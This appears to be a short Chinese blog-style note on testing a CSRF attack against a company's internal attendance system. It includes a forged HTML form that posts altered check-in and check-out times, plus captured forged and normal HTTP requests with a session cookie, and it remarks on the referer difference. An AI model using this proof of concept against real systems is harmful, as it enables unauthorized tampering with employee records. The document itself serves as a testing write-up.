刚才拿公司内网验证了下,写了个简单的测试页面
<html>
<body>
<p>看看考勤时间</p>
<form name="transfer" method="post" action="http://172.16.1.3/newiweb/kqgl/dealKqgl.do?action=WorkTimeInto">
<p>考勤ID: <input type="text" name="kqdjId" value=""/></p>
<p>日期: <input type="text" name="date" value="2013-11-29"/></p>
<p>textfield: <input type="text" name="textfield" value="E6%98%9F%E6%9C%9F%E4%BA%94"/></p>
<p>上班时间时: <input type="text" name="sbsj_hour" value="10"/></p>
<p>上班时间分: <input type="text" name="sbsj_min" value="30"/></p>
<p>下班时间时: <input type="text" name="xbsj_hour" value="18"/></p>
<p>下班时间分: <input type="text" name="xbsj_min" value="30"/></p>
<p>是否今日: <input type="text" name="istoday" value="0"/></p>
<input type="submit" value="提交" />
</form>
</body>
</html>
然后抓了下请求
模拟页面请求内容:
POST /newiweb/kqgl/dealKqgl.do?action=WorkTimeInto HTTP/1.1
Host: 172.16.1.3
Proxy-Connection: keep-alive
Content-Length: 75
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://172.20.52.14:8081
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1664.3 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://172.20.52.14:8081/post.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: JSESSIONID=A56BDC4BFC98F05238098D1F01B26821; 1=1
date=2013-11-29&sbsj_hour=09&sbsj_min=30&xbsj_hour=18&xbsj_min=30&istoday=0
正常提交请求内容
POST /newiweb/kqgl/dealKqgl.do?action=WorkTimeInto HTTP/1.1
Host: 172.16.1.3
Proxy-Connection: keep-alive
Content-Length: 154
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://172.16.1.3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1664.3 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://172.16.1.3/newiweb/kqgl/dealKqgl.do?action=KQDJDatechange&&date=2013-11-29
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: JSESSIONID=A56BDC4BFC98F05238098D1F01B26821; 1=1
kqdjId=1020031&date=2013-11-29&textfield=%E6%98%9F%E6%9C%9F%E4%BA%94&sbsj_hour=09&sbsj_min=00&xbsj_hour=18&xbsj_min=00&istoday=0&button=%E6%8F%90%E4%BA%A4
其中post内容还没修改完全。
很明显这样模拟了一次csrf,也会提交cookies,但是referer不同,一个是来自于我自己搭建的服务器,一个是来自于提交页面。
如果用脚本模拟的话,还需要搭上cookies才可以。